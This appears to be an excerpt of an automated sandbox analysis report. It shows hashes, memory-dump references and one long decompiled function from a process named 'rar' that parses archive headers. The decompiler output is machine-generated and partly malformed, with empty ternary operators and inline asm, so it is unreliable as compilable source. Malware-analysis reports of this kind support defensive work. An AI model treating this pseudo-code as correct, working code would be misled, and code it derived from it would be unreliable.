                                                                                                            • Opcode ID: e8e1da3073e06fc7d51951a2a28e401dc64074e225d4731dcde231b5223df575
                                                                                                            • Instruction ID: 0abdc057ad7b1f8c67cd4dc4bb032059dbc45b1f0136e9227d3753ce91d4c3a5
                                                                                                            • Opcode Fuzzy Hash: e8e1da3073e06fc7d51951a2a28e401dc64074e225d4731dcde231b5223df575
                                                                                                            • Instruction Fuzzy Hash: D131A432618F8296DB60CF25E8802AE73A0FB8A794F580135EA9E93B55DF3DC555CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B2EE14 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3398352648-0
                                                                                                            • Opcode ID: 2f562b4152e88a86925a854f74a693cc38a25b6cb2435ae038de67a83618fa73
                                                                                                            • Instruction ID: 382611ba72e414b0ac3ca49dc7f879e8ad7061a81511ec1a7687dbf9f745eb8b
                                                                                                            • Opcode Fuzzy Hash: 2f562b4152e88a86925a854f74a693cc38a25b6cb2435ae038de67a83618fa73
                                                                                                            • Instruction Fuzzy Hash: 0C11303262874796E7909F61E89466A73A4FF85BC0F584135EA8F93B68CF3DD005CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B1DBF0 Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 556COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 76%
                                                                                                            			E00007FF67FF650B1DBF0(long long __rbx, void* __rcx, long long __rdi, long long __rsi) {
				void* __rbp;
				void* _t229;
				void* _t233;
				void* _t234;
				void* _t237;
				unsigned int _t239;
				void* _t243;
				void* _t247;
				signed int _t253;
				void* _t276;
				signed int _t279;
				unsigned int _t303;
				signed int _t307;
				signed int _t335;
				intOrPtr _t341;
				unsigned int _t345;
				signed char _t348;
				signed char _t370;
				intOrPtr _t373;
				void* _t379;
				void* _t380;
				void* _t394;
				void* _t397;
				signed int _t401;
				void* _t403;
				void* _t436;
				signed long long _t437;
				long long _t448;
				long long _t453;
				signed long long _t455;
				long long _t460;
				void* _t461;
				void* _t462;
				void* _t463;
				void* _t486;
				intOrPtr _t504;
				long long _t560;
				long long _t562;
				void* _t564;
				long long _t566;
				void* _t568;
				void* _t569;
				void* _t571;
				signed long long _t572;
				void* _t575;
				void* _t586;
				void* _t589;
				void* _t590;
				void* _t592;
				long long _t593;
				long long _t595;
				void* _t597;
				long long _t599;
				void* _t601;
				void* _t602;

				_t556 = __rdi;
				_t460 = __rbx;
				_t436 = _t571;
				 *((long long*)(_t436 + 0x10)) = __rbx;
				 *((long long*)(_t436 + 0x18)) = __rsi;
				 *((long long*)(_t436 + 0x20)) = __rdi;
				_t569 = _t436 - 0x2078;
				E00007FF67FF650B69CB0(0x2150, _t436, _t589, _t590);
				_t572 = _t571 - _t436;
				_t437 =  *0x50b978f0; // 0x27db226282f1
				 *(_t569 + 0x2040) = _t437 ^ _t572;
				_t602 = __rcx;
				E00007FF67FF650B48A20(_t437 ^ _t572, _t572 + 0x50, __rcx);
				r12d = r12d ^ r12d;
				if ( *((intOrPtr*)(__rcx + 0x7f84)) == r12b) goto 0x50b1ddd7;
				if ( *((intOrPtr*)(__rcx + 0x7f68)) -  *((intOrPtr*)(__rcx + 0x7f88)) + 8 <= 0) goto 0x50b1ddd7;
				r14b = dil;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x22d8)) + 0x6133)) == r12b) goto 0x50b1dc96;
				_t13 = _t556 + 0x7e; // 0x7f
				E00007FF67FF650B111C0(_t13, __rcx + 0x3a);
				 *(_t602 + 0x7f91) = dil;
				goto 0x50b1e566;
				r8d = 0x10;
				if ( *0x50b80550() != 0x10) goto 0x50b1e55d;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t602 + 0x22d8)) + 0x6130)) != r12b) goto 0x50b1dcd5;
				if (E00007FF67FF650B33820() == 0) goto 0x50b1dcd8;
				if ( *((intOrPtr*)(_t602 + 0x2308)) == r12b) goto 0x50b1dcf5;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t602 + 0x22d8)) + 0x6130)) == r12b) goto 0x50b1e566;
				E00007FF67FF650B1E950(_t602);
				_t593 = _t602 + 0x34fc;
				_t560 = _t602 + 0x1040;
				r13d = 0;
				goto 0x50b1dd55;
				if ( *(_t569 + 0x10) ==  *((intOrPtr*)(_t602 + 0x350c))) goto 0x50b1dda7;
				if (dil != 0) goto 0x50b1ddb0;
				E00007FF67FF650B112C8(0x83, _t602 + 0x3a, _t602 + 0x3a);
				E00007FF67FF650B5785C(1, _t380,  *((intOrPtr*)(_t602 + 0x22d8)) + 0x6030, __rdi);
				E00007FF67FF650B1E950(_t602);
				 *((long long*)(_t572 + 0x40)) = _t569 + 0x10;
				 *((long long*)(_t572 + 0x38)) = _t595;
				 *(_t572 + 0x30) =  *(_t602 + 0x34f8);
				_t448 = _t569 + 0x18;
				 *((long long*)(_t572 + 0x28)) = _t448;
				 *((long long*)(_t572 + 0x20)) = _t593;
				_t586 =  *((intOrPtr*)(_t602 + 0x22d8)) + 0x6030;
				r8d = 5;
				E00007FF67FF650B28FF0(0, __rbx, _t560, _t586);
				if ( *(_t602 + 0x34f4) != r13b) goto 0x50b1dd10;
				 *((long long*)(_t569 - 0x70)) = _t560;
				r12d = 0;
				goto 0x50b1ddda;
				_t229 = E00007FF67FF650B112C8(6, _t602 + 0x3a, _t602 + 0x3a);
				 *(_t602 + 0x7f91) = dil;
				E00007FF67FF650B2CC24(_t229, 0xb,  *(_t602 + 0x34f4) - r13b, 0x50ba7ab8);
				goto 0x50b1e566;
				r14b = r12b;
				E00007FF67FF650B48D0C(dil, 6, _t379, _t460, _t572 + 0x50, _t602 + 0x3a, _t556, _t560, _t569, _t602 + 0x3a, _t601, _t597);
				if (_t448 - 7 < 0) goto 0x50b1e55d;
				 *(_t602 + 0x348c) = r12b;
				 *((intOrPtr*)(_t602 + 0x347c)) = E00007FF67FF650B48A9C(_t572 + 0x50);
				_t233 = E00007FF67FF650B48C40(_t572 + 0x50, _t602 + 0x3a);
				_t234 = E00007FF67FF650B48BF8(_t572 + 0x50, _t586);
				if (_t448 == 0) goto 0x50b1e553;
				_t394 = _t233;
				if (_t394 == 0) goto 0x50b1e553;
				_t46 = _t460 - 3; // -3
				_t47 = _t460 + 4; // 0x4
				_t373 = _t47 + _t234;
				if (_t394 < 0) goto 0x50b1e553;
				if (_t373 - 7 < 0) goto 0x50b1e553;
				E00007FF67FF650B48D0C(_t233, _t46 + _t234, _t379, _t460, _t572 + 0x50, _t46 + _t234, _t556, _t560, _t569, _t602 + 0x3a, _t595, _t592);
				if ( *((intOrPtr*)(_t569 - 0x80)) - _t448 < 0) goto 0x50b1e55d;
				_t237 = E00007FF67FF650B48BC8(_t373, _t46 + _t234, _t572 + 0x50);
				 *(_t602 + 0x3480) = E00007FF67FF650B48BF8(_t572 + 0x50, _t586);
				_t239 = E00007FF67FF650B48BF8(_t572 + 0x50, _t586);
				 *(_t602 + 0x3484) = _t239;
				 *(_t602 + 0x348c) = _t239 >> 0x00000002 & dil;
				 *((intOrPtr*)(_t602 + 0x3488)) = _t373;
				 *(_t602 + 0x22ec) =  *(_t602 + 0x3480);
				_t397 =  *((intOrPtr*)(_t602 + 0x347c)) - _t237;
				r13b = _t397 != 0;
				if (_t397 == 0) goto 0x50b1df01;
				_t243 = E00007FF67FF650B1C1E8(_t397, _t602);
				 *(_t602 + 0x7f90) = dil;
				E00007FF67FF650B2CC24(_t243, 3, _t397, 0x50ba7ab8);
				if (r14b == 0) goto 0x50b1df01;
				_t575 = _t602 + 0x3a;
				E00007FF67FF650B112C8(4, _t602 + 0x3a, _t575);
				goto 0x50b1dc8a;
				if (( *(_t602 + 0x3484) & dil) == 0) goto 0x50b1df2a;
				_t486 = _t572 + 0x50;
				E00007FF67FF650B48BF8(_t486, _t586);
				_t599 = _t448;
				if (_t448 - _t486 >= 0) goto 0x50b1e553;
				_t401 =  *(_t602 + 0x3484) & 0x00000002;
				if (_t401 == 0) goto 0x50b1df44;
				_t247 = E00007FF67FF650B48BF8(_t572 + 0x50, _t586);
				_t562 = _t448;
				r8d = E00007FF67FF650B18DA0(_t247,  *((intOrPtr*)(_t602 + 0x3488)), _t602, _t602 + 0x3a);
				if (_t401 < 0) goto 0x50b1df7a;
				if (_t562 < 0) goto 0x50b1df7a;
				_t403 = _t575 +  *((intOrPtr*)(_t602 + 0x7f68)) - 0xffffffff - _t562;
				if (_t403 <= 0) goto 0x50b1df7d;
				 *((long long*)(_t602 + 0x7f70)) = _t593;
				if (_t403 == 0) goto 0x50b1e407;
				if (_t403 == 0) goto 0x50b1e139;
				if (_t403 == 0) goto 0x50b1e139;
				if (_t403 == 0) goto 0x50b1dff8;
				if ( *(_t602 + 0x3480) - 0xfffffffffffffffe != 1) goto 0x50b1e540;
				asm("inc ecx");
				asm("inc ecx");
				 *(_t602 + 0x5850) =  *(_t602 + 0x348c);
				 *(_t602 + 0x585c) = E00007FF67FF650B48BF8(_t572 + 0x50, _t586) & dil;
				 *(_t602 + 0x585e) =  *(_t602 + 0x585e) & 0x00000000;
				 *(_t602 + 0x585d) = r12b;
				goto 0x50b1e540;
				asm("inc ecx");
				asm("inc ecx");
				 *(_t602 + 0x34f0) =  *(_t602 + 0x348c);
				_t253 = E00007FF67FF650B48BF8(_t572 + 0x50, _t586);
				if (_t253 == 0) goto 0x50b1e051;
				r9d = _t253;
				E00007FF67FF650B1657C( *(_t602 + 0x3480) - 0xfffffffffffffffe, _t593, _t569 + 0x18, _t602 + 0x3a, 0x50b80ea8, _t586, _t568);
				E00007FF67FF650B1EBE8(_t253, _t460, _t602, _t602 + 0x3a, _t562, _t569, _t569 + 0x18);
				goto 0x50b1e566;
				 *(_t602 + 0x34f4) = E00007FF67FF650B48BF8(_t572 + 0x50, _t586) & dil;
				_t335 = E00007FF67FF650B48A48(_t572 + 0x50) & 0x000000ff;
				 *(_t602 + 0x34f8) = _t335;
				if (_t335 - 0x18 <= 0) goto 0x50b1e08a;
				r9d = _t335;
				goto 0x50b1e02e;
				_t453 =  *((intOrPtr*)(_t602 + 0x22d8));
				if ( *((intOrPtr*)(_t453 + 0x71e0)) == r12b) goto 0x50b1e0aa;
				if (_t335 - 0x12 <= 0) goto 0x50b1e0aa;
				 *(_t602 + 0x34f8) = 0xf;
				r8d = 0x10;
				E00007FF67FF650B48B14(_t460, _t572 + 0x50, _t602 + 0x34fc, _t562, _t569, L"hc%u");
				if ( *(_t602 + 0x34f4) == r12b) goto 0x50b1e12d;
				_t461 = _t602 + 0x350c;
				r8d = 8;
				E00007FF67FF650B48B14(_t461, _t572 + 0x50, _t461, _t562, _t569, L"hc%u");
				_t101 = _t562 - 4; // 0x4
				r8d = _t101;
				E00007FF67FF650B59644(E00007FF67FF650B48B14(_t461, _t572 + 0x50, _t569 + 0x10, _t562, _t569, L"hc%u"), _t569 - 0x60);
				r8d = 8;
				E00007FF67FF650B59684(_t461, _t569 - 0x60, _t461, _t556, _t562, L"hc%u");
				E00007FF67FF650B59510(8, _t453, _t461, _t569 - 0x60, _t569 + 0x18, _t556, _t562, L"hc%u");
				 *(_t602 + 0x34f4) =  *(_t569 + 0x10) & 0xffffff00 |  *(_t569 + 0x10) ==  *((intOrPtr*)(_t569 + 0x18));
				 *(_t602 + 0x7f84) = dil;
				goto 0x50b1e540;
				_t322 =  ==  ? 0x3518 : 0x5880;
				_t462 = _t461 + _t602;
				E00007FF67FF650B36990(_t462, _t462, _t569 + 0x18, _t562, L"hc%u");
				asm("inc ecx");
				asm("movups [ebx], xmm0");
				 *(_t462 + 0x10) =  *(_t602 + 0x348c);
				r12d =  *(_t602 + 0x3480);
				 *(_t462 + 0x1111) = dil;
				 *((long long*)(_t462 + 0x1068)) = _t562;
				 *(_t462 + 0x10a4) = E00007FF67FF650B48BF8(_t572 + 0x50, _t586);
				E00007FF67FF650B48BF8(_t572 + 0x50, _t586);
				 *((long long*)(_t462 + 0x1070)) = _t453;
				 *(_t462 + 0x10aa) =  *(_t462 + 0x10a4) >> 0x00000003 & dil;
				if (0x14 == 2) goto 0x50b1e1c6;
				 *((long long*)(_t462 + 0x1070)) = 0x7fffffff;
				_t504 =  *((intOrPtr*)(_t462 + 0x1068));
				_t455 =  *((intOrPtr*)(_t462 + 0x1070));
				_t505 =  <=  ? _t455 : _t504;
				 *((long long*)(_t462 + 0x1078)) =  <=  ? _t455 : _t504;
				 *((intOrPtr*)(_t462 + 0x24)) = E00007FF67FF650B48BF8(_t572 + 0x50, _t586);
				if (( *(_t462 + 0x10a4) & 0x00000002) == 0) goto 0x50b1e210;
				_t276 = E00007FF67FF650B48A9C(_t572 + 0x50);
				_t135 = _t462 + 0x1050; // 0x68d0
				E00007FF67FF650B5BCA0(_t276, _t135, _t569 + 0x18);
				 *(_t462 + 0x1080) = 0;
				if (( *(_t462 + 0x10a4) & 0x00000004) == 0) goto 0x50b1e23b;
				 *(_t462 + 0x1080) = 2;
				 *((intOrPtr*)(_t462 + 0x1084)) = E00007FF67FF650B48A9C(_t572 + 0x50);
				 *((intOrPtr*)(_t462 + 0x1118)) = 0;
				_t279 = E00007FF67FF650B48BF8(_t572 + 0x50, _t586);
				 *(_t462 + 0x20) = _t279 >> 0x00000007 & 0x00000007;
				_t341 = (_t279 & 0x0000003f) + 0x32;
				 *((intOrPtr*)(_t462 + 0x1c)) = _t341;
				if (_t341 == 0x32) goto 0x50b1e270;
				 *((intOrPtr*)(_t462 + 0x1c)) = 0x270f;
				 *((char*)(_t462 + 0x18)) = E00007FF67FF650B48BF8(_t572 + 0x50, _t586);
				E00007FF67FF650B48BF8(_t572 + 0x50, _t586);
				 *(_t462 + 0x1110) =  *(_t602 + 0x3484) >> 0x00000006 & dil;
				 *(_t462 + 0x1114) = 2;
				r9d = 0;
				if ( *((intOrPtr*)(_t462 + 0x18)) != dil) goto 0x50b1e2b8;
				 *(_t462 + 0x1114) = 1;
				goto 0x50b1e2c5;
				if ( *((intOrPtr*)(_t462 + 0x18)) != r9b) goto 0x50b1e2c5;
				 *(_t462 + 0x1114) = r9d;
				_t345 =  *(_t462 + 8);
				 *(_t462 + 0x10a8) = _t345 >> 0x00000003 & dil;
				 *(_t462 + 0x10a9) = _t345 >> 0x00000004 & dil;
				 *(_t462 + 0x1112) = _t345 >> 0x00000005 & dil;
				if (r12d != 2) goto 0x50b1e2ff;
				if ((sil & 0x00000040) != 0) goto 0x50b1e302;
				 *((char*)(_t462 + 0x1100)) = r9b;
				_t370 =  *(_t462 + 0x10a4) & dil;
				 *(_t462 + 0x1101) = _t370;
				_t348 = sil;
				_t457 =  !=  ? _t586 : _t455 << _t348;
				 *((long long*)(_t462 + 0x1108)) =  !=  ? _t586 : _t455 << _t348;
				asm("sbb ecx, ecx");
				 *(_t462 + 0x10ac) = _t348 & 0x00000005;
				_t564 =  <  ? _t455 : _t455;
				E00007FF67FF650B48B14(_t462, _t572 + 0x50, _t569 + 0x40, _t564, _t569, _t564);
				if (_t564 - 0x2000 >= 0) goto 0x50b1e5a2;
				 *((char*)(_t569 + _t564 + 0x40)) = 0;
				_t174 = _t462 + 0x28; // 0x58a8
				r8d = 0x800;
				E00007FF67FF650B5D1FC(_t462, _t569 + 0x40, _t174, _t564);
				if (_t599 == 0) goto 0x50b1e3a5;
				E00007FF67FF650B1C37C( ==  ? 0x3518 : 0x5880,  !=  ? _t586 : _t455 << _t348, _t462, _t602, _t572 + 0x50, _t599, _t462);
				if (r12d != 2) goto 0x50b1e3ce;
				E00007FF67FF650B1C2E4(_t462, _t602, _t174);
				E00007FF67FF650B1C23C(_t462, _t602, _t462);
				E00007FF67FF650B1A8D4(_t462, _t602, _t462);
				goto 0x50b1e3e8;
				if (E00007FF67FF650B719B4(r12d - 2, _t174, L"CMT") != 0) goto 0x50b1e3e8;
				 *(_t602 + 0x7f7e) = dil;
				if (r13b == 0) goto 0x50b1e540;
				E00007FF67FF650B112C8(0x1c, _t602 + 0x3a, _t174);
				goto 0x50b1e540;
				_t463 = _t602 + 0x34a0;
				E00007FF67FF650B36A38( !=  ? _t586 : _t455 << _t348, _t463);
				asm("inc ecx");
				asm("movups [ebx], xmm0");
				 *(_t463 + 0x10) =  *(_t602 + 0x348c);
				_t303 = E00007FF67FF650B48BF8(_t572 + 0x50, _t462);
				 *(_t602 + 0x7f7d) = _t303 & dil;
				 *(_t602 + 0x7f7c) = _t303 >> 0x00000002 & dil;
				 *(_t602 + 0x7f7f) = _t303 >> 0x00000004 & dil;
				 *(_t602 + 0x7f83) = _t303 >> 0x00000003 & dil;
				 *(_t602 + 0x7f80) = r12b;
				 *(_t602 + 0x7f82) = dil;
				if ((_t370 & 0x00000002) == 0) goto 0x50b1e48e;
				E00007FF67FF650B48BF8(_t572 + 0x50, _t462);
				goto 0x50b1e491;
				_t307 = r12d;
				 *(_t602 + 0x7fa4) = _t307;
				if ( *(_t602 + 0x7f7d) == r12b) goto 0x50b1e4a5;
				if (_t307 == 0) goto 0x50b1e4a8;
				dil = r12b;
				 *(_t602 + 0x7f81) = dil;
				if (_t599 == 0) goto 0x50b1e4c7;
				E00007FF67FF650B1C37C( ==  ? 0x3518 : 0x5880,  !=  ? _t586 : _t455 << _t348, _t463, _t602, _t572 + 0x50, _t599, _t463);
				if ( *((intOrPtr*)(_t602 + 0x3478)) != r12b) goto 0x50b1e540;
				if ( *((intOrPtr*)(_t602 + 0x34be)) == r12b) goto 0x50b1e540;
				if ( *((intOrPtr*)(_t602 + 0x34c0)) - _t593 <= 0) goto 0x50b1e540;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t602 + 0x22d8)) + 0x2018)) == r12d) goto 0x50b1e540;
				_t566 =  *((intOrPtr*)(_t602 + 0x7f70));
				r14d =  *(_t602 + 0x22ec);
				r8d = 0;
				E00007FF67FF650B4758C( *((intOrPtr*)(_t602 + 0x22d8)), _t602 + 0x2310, _t602 + 0x2310, _t602, _t566);
				E00007FF67FF650B4760C(_t602 + 0x2310, _t602 + 0x2310,  *((intOrPtr*)(_t602 + 0x34c0)), _t566, _t569);
				 *((long long*)(_t602 + 0x7f70)) = _t566;
				 *(_t602 + 0x22ec) = r14d;
				E00007FF67FF650B11534(_t572 + 0x50);
				goto 0x50b1e572;
				E00007FF67FF650B1C1E8( *((intOrPtr*)( *((intOrPtr*)(_t602 + 0x22d8)) + 0x2018)) - r12d, _t602);
				goto 0x50b1e566;
				E00007FF67FF650B1EBA0( *((intOrPtr*)(_t569 - 0x80)), _t602);
				E00007FF67FF650B11534(_t572 + 0x50);
				return E00007FF67FF650B69D10(0, _t303 >> 0x00000004 & dil,  *(_t569 + 0x2040) ^ _t572);
			}


























































                                                                                                            0x7ff650b1dbf0
                                                                                                            0x7ff650b1dbf0
                                                                                                            0x7ff650b1dbf0
                                                                                                            0x7ff650b1dbf3
                                                                                                            0x7ff650b1dbf7
                                                                                                            0x7ff650b1dbfb
                                                                                                            0x7ff650b1dc08
                                                                                                            0x7ff650b1dc14
                                                                                                            0x7ff650b1dc19
                                                                                                            0x7ff650b1dc1c
                                                                                                            0x7ff650b1dc26
                                                                                                            0x7ff650b1dc2d
                                                                                                            0x7ff650b1dc38
                                                                                                            0x7ff650b1dc43
                                                                                                            0x7ff650b1dc4d
                                                                                                            0x7ff650b1dc65
                                                                                                            0x7ff650b1dc6b
                                                                                                            0x7ff650b1dc7c
                                                                                                            0x7ff650b1dc82
                                                                                                            0x7ff650b1dc85
                                                                                                            0x7ff650b1dc8a
                                                                                                            0x7ff650b1dc91
                                                                                                            0x7ff650b1dc99
                                                                                                            0x7ff650b1dcb3
                                                                                                            0x7ff650b1dcc7
                                                                                                            0x7ff650b1dcd3
                                                                                                            0x7ff650b1dcdf
                                                                                                            0x7ff650b1dcef
                                                                                                            0x7ff650b1dcf8
                                                                                                            0x7ff650b1dcfd
                                                                                                            0x7ff650b1dd04
                                                                                                            0x7ff650b1dd0b
                                                                                                            0x7ff650b1dd0e
                                                                                                            0x7ff650b1dd1b
                                                                                                            0x7ff650b1dd2a
                                                                                                            0x7ff650b1dd35
                                                                                                            0x7ff650b1dd48
                                                                                                            0x7ff650b1dd50
                                                                                                            0x7ff650b1dd59
                                                                                                            0x7ff650b1dd5e
                                                                                                            0x7ff650b1dd6a
                                                                                                            0x7ff650b1dd6e
                                                                                                            0x7ff650b1dd72
                                                                                                            0x7ff650b1dd7e
                                                                                                            0x7ff650b1dd83
                                                                                                            0x7ff650b1dd8a
                                                                                                            0x7ff650b1dd95
                                                                                                            0x7ff650b1dda1
                                                                                                            0x7ff650b1dda7
                                                                                                            0x7ff650b1ddab
                                                                                                            0x7ff650b1ddae
                                                                                                            0x7ff650b1ddb5
                                                                                                            0x7ff650b1ddba
                                                                                                            0x7ff650b1ddcd
                                                                                                            0x7ff650b1ddd2
                                                                                                            0x7ff650b1ddd7
                                                                                                            0x7ff650b1dde4
                                                                                                            0x7ff650b1dded
                                                                                                            0x7ff650b1ddf3
                                                                                                            0x7ff650b1de04
                                                                                                            0x7ff650b1de15
                                                                                                            0x7ff650b1de21
                                                                                                            0x7ff650b1de29
                                                                                                            0x7ff650b1de2f
                                                                                                            0x7ff650b1de31
                                                                                                            0x7ff650b1de37
                                                                                                            0x7ff650b1de3a
                                                                                                            0x7ff650b1de3d
                                                                                                            0x7ff650b1de41
                                                                                                            0x7ff650b1de4a
                                                                                                            0x7ff650b1de58
                                                                                                            0x7ff650b1de63
                                                                                                            0x7ff650b1de6e
                                                                                                            0x7ff650b1de7f
                                                                                                            0x7ff650b1de8b
                                                                                                            0x7ff650b1de90
                                                                                                            0x7ff650b1de9d
                                                                                                            0x7ff650b1dea4
                                                                                                            0x7ff650b1deb2
                                                                                                            0x7ff650b1deb9
                                                                                                            0x7ff650b1dec0
                                                                                                            0x7ff650b1dec4
                                                                                                            0x7ff650b1dec9
                                                                                                            0x7ff650b1dece
                                                                                                            0x7ff650b1dee1
                                                                                                            0x7ff650b1dee9
                                                                                                            0x7ff650b1deef
                                                                                                            0x7ff650b1def7
                                                                                                            0x7ff650b1defc
                                                                                                            0x7ff650b1df0b
                                                                                                            0x7ff650b1df0d
                                                                                                            0x7ff650b1df12
                                                                                                            0x7ff650b1df17
                                                                                                            0x7ff650b1df24
                                                                                                            0x7ff650b1df2d
                                                                                                            0x7ff650b1df35
                                                                                                            0x7ff650b1df3c
                                                                                                            0x7ff650b1df41
                                                                                                            0x7ff650b1df53
                                                                                                            0x7ff650b1df5d
                                                                                                            0x7ff650b1df62
                                                                                                            0x7ff650b1df71
                                                                                                            0x7ff650b1df78
                                                                                                            0x7ff650b1df7d
                                                                                                            0x7ff650b1df8f
                                                                                                            0x7ff650b1df97
                                                                                                            0x7ff650b1df9f
                                                                                                            0x7ff650b1dfa7
                                                                                                            0x7ff650b1dfab
                                                                                                            0x7ff650b1dfb1
                                                                                                            0x7ff650b1dfb9
                                                                                                            0x7ff650b1dfc8
                                                                                                            0x7ff650b1dfdc
                                                                                                            0x7ff650b1dfe3
                                                                                                            0x7ff650b1dfec
                                                                                                            0x7ff650b1dff3
                                                                                                            0x7ff650b1dff8
                                                                                                            0x7ff650b1e000
                                                                                                            0x7ff650b1e00f
                                                                                                            0x7ff650b1e01b
                                                                                                            0x7ff650b1e022
                                                                                                            0x7ff650b1e024
                                                                                                            0x7ff650b1e037
                                                                                                            0x7ff650b1e047
                                                                                                            0x7ff650b1e04c
                                                                                                            0x7ff650b1e05e
                                                                                                            0x7ff650b1e06f
                                                                                                            0x7ff650b1e072
                                                                                                            0x7ff650b1e07c
                                                                                                            0x7ff650b1e07e
                                                                                                            0x7ff650b1e088
                                                                                                            0x7ff650b1e08a
                                                                                                            0x7ff650b1e098
                                                                                                            0x7ff650b1e09d
                                                                                                            0x7ff650b1e09f
                                                                                                            0x7ff650b1e0b1
                                                                                                            0x7ff650b1e0bc
                                                                                                            0x7ff650b1e0c8
                                                                                                            0x7ff650b1e0ca
                                                                                                            0x7ff650b1e0d6
                                                                                                            0x7ff650b1e0e1
                                                                                                            0x7ff650b1e0e6
                                                                                                            0x7ff650b1e0e6
                                                                                                            0x7ff650b1e0fc
                                                                                                            0x7ff650b1e101
                                                                                                            0x7ff650b1e10b
                                                                                                            0x7ff650b1e118
                                                                                                            0x7ff650b1e126
                                                                                                            0x7ff650b1e12d
                                                                                                            0x7ff650b1e134
                                                                                                            0x7ff650b1e146
                                                                                                            0x7ff650b1e149
                                                                                                            0x7ff650b1e151
                                                                                                            0x7ff650b1e156
                                                                                                            0x7ff650b1e15e
                                                                                                            0x7ff650b1e168
                                                                                                            0x7ff650b1e16b
                                                                                                            0x7ff650b1e172
                                                                                                            0x7ff650b1e179
                                                                                                            0x7ff650b1e18a
                                                                                                            0x7ff650b1e195
                                                                                                            0x7ff650b1e19a
                                                                                                            0x7ff650b1e1ad
                                                                                                            0x7ff650b1e1b3
                                                                                                            0x7ff650b1e1bf
                                                                                                            0x7ff650b1e1c6
                                                                                                            0x7ff650b1e1cd
                                                                                                            0x7ff650b1e1d7
                                                                                                            0x7ff650b1e1db
                                                                                                            0x7ff650b1e1ec
                                                                                                            0x7ff650b1e1f6
                                                                                                            0x7ff650b1e1fd
                                                                                                            0x7ff650b1e204
                                                                                                            0x7ff650b1e20b
                                                                                                            0x7ff650b1e212
                                                                                                            0x7ff650b1e21f
                                                                                                            0x7ff650b1e221
                                                                                                            0x7ff650b1e235
                                                                                                            0x7ff650b1e23b
                                                                                                            0x7ff650b1e246
                                                                                                            0x7ff650b1e256
                                                                                                            0x7ff650b1e25e
                                                                                                            0x7ff650b1e261
                                                                                                            0x7ff650b1e267
                                                                                                            0x7ff650b1e269
                                                                                                            0x7ff650b1e27a
                                                                                                            0x7ff650b1e282
                                                                                                            0x7ff650b1e297
                                                                                                            0x7ff650b1e29d
                                                                                                            0x7ff650b1e2a7
                                                                                                            0x7ff650b1e2ae
                                                                                                            0x7ff650b1e2b0
                                                                                                            0x7ff650b1e2b6
                                                                                                            0x7ff650b1e2bc
                                                                                                            0x7ff650b1e2be
                                                                                                            0x7ff650b1e2c5
                                                                                                            0x7ff650b1e2d0
                                                                                                            0x7ff650b1e2de
                                                                                                            0x7ff650b1e2ea
                                                                                                            0x7ff650b1e2f4
                                                                                                            0x7ff650b1e2fd
                                                                                                            0x7ff650b1e302
                                                                                                            0x7ff650b1e30e
                                                                                                            0x7ff650b1e311
                                                                                                            0x7ff650b1e322
                                                                                                            0x7ff650b1e32a
                                                                                                            0x7ff650b1e32e
                                                                                                            0x7ff650b1e33d
                                                                                                            0x7ff650b1e342
                                                                                                            0x7ff650b1e350
                                                                                                            0x7ff650b1e360
                                                                                                            0x7ff650b1e36c
                                                                                                            0x7ff650b1e372
                                                                                                            0x7ff650b1e377
                                                                                                            0x7ff650b1e37b
                                                                                                            0x7ff650b1e388
                                                                                                            0x7ff650b1e390
                                                                                                            0x7ff650b1e3a0
                                                                                                            0x7ff650b1e3a9
                                                                                                            0x7ff650b1e3b1
                                                                                                            0x7ff650b1e3bc
                                                                                                            0x7ff650b1e3c7
                                                                                                            0x7ff650b1e3cc
                                                                                                            0x7ff650b1e3df
                                                                                                            0x7ff650b1e3e1
                                                                                                            0x7ff650b1e3eb
                                                                                                            0x7ff650b1e3fd
                                                                                                            0x7ff650b1e402
                                                                                                            0x7ff650b1e407
                                                                                                            0x7ff650b1e411
                                                                                                            0x7ff650b1e416
                                                                                                            0x7ff650b1e41e
                                                                                                            0x7ff650b1e428
                                                                                                            0x7ff650b1e430
                                                                                                            0x7ff650b1e43d
                                                                                                            0x7ff650b1e44c
                                                                                                            0x7ff650b1e45b
                                                                                                            0x7ff650b1e468
                                                                                                            0x7ff650b1e46f
                                                                                                            0x7ff650b1e476
                                                                                                            0x7ff650b1e480
                                                                                                            0x7ff650b1e487
                                                                                                            0x7ff650b1e48c
                                                                                                            0x7ff650b1e48e
                                                                                                            0x7ff650b1e491
                                                                                                            0x7ff650b1e49f
